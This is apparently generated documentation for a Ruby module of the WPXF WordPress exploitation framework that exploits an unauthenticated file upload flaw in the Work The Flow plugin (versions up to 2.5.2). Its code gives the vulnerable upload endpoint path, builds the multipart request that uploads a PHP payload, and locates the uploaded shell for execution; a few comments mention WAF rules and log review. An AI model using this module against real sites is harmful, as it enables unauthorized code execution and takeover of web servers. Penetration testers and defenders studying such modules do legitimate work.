class Wpxf::Exploit::WorkTheFlowShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 6
# Sets up the module and registers its descriptive metadata.
#
# Runs the superclass constructor first, then hands update_info the module
# name, a description stating the affected plugin versions (<= 2.5.2), the
# credits, the advisory references and a date string.
def initialize
  super

  summary = 'This module exploits a file upload vulnerability in versions '\
            '<= 2.5.2 of the Work The Flow plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.'
  credits = [
    'Claudio Viviani', # Vulnerability discovery
    'rastating'        # WPXF module
  ]
  # Advisory identifiers as [source, id] pairs.
  advisories = [%w[WPVDB 7883], %w[EDB 36640]]

  update_info(
    name: 'Work The Flow Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Mar 14 2015' # presumably the disclosure date; confirm against update_info
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 27
# Version check for the target plugin.
#
# Delegates to check_plugin_version_from_readme with the plugin slug and
# '2.5.3'. The helper is defined elsewhere; given the module description
# (affected versions <= 2.5.2), '2.5.3' is presumably the first fixed release.
# The helper's name suggests the version is taken from the plugin readme.
#
# @return whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'work-the-flow-file-upload'
  fixed_in = '2.5.3'
  check_plugin_version_from_readme(plugin_slug, fixed_in)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 51
# Builds the body of the upload request.
#
# The body carries a form field 'action' set to 'upload' and a file part named
# 'files' whose content is payload.encoded and whose filename is payload_name.
# Those two field names are the request shape a WAF rule or access-log review
# would match for this issue.
#
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder
  Utility::BodyBuilder.new.tap do |body|
    body.add_field('action', 'upload')
    body.add_file_from_string('files', payload.encoded, payload_name)
  end
end
plugin_url()
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 31
# URL of the server-side PHP directory of the jQuery-File-Upload 9.5.0 copy
# bundled with the plugin, under the site's plugins directory.
#
# @return the result of normalize_uri for the joined path segments
def plugin_url
  bundled_handler_path = %w[
    work-the-flow-file-upload
    public
    assets
    jQuery-File-Upload-9.5.0
    server
    php
  ]
  normalize_uri(wordpress_url_plugins, *bundled_handler_path)
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 47
# Location where the uploaded file ends up: the 'files' directory beneath
# plugin_url, followed by payload_name. Unexpected files in that directory are
# what an administrator would look for when checking a site for this issue.
#
# @return the result of normalize_uri for plugin_url, 'files' and payload_name
def uploaded_payload_location
  upload_dir = 'files'
  normalize_uri(plugin_url, upload_dir, payload_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 43
# URL of the upload handler script: index.php inside the directory returned by
# plugin_url.
#
# @return the result of normalize_uri for plugin_url and 'index.php'
def uploader_url
  handler_script = 'index.php'
  normalize_uri(plugin_url, handler_script)
end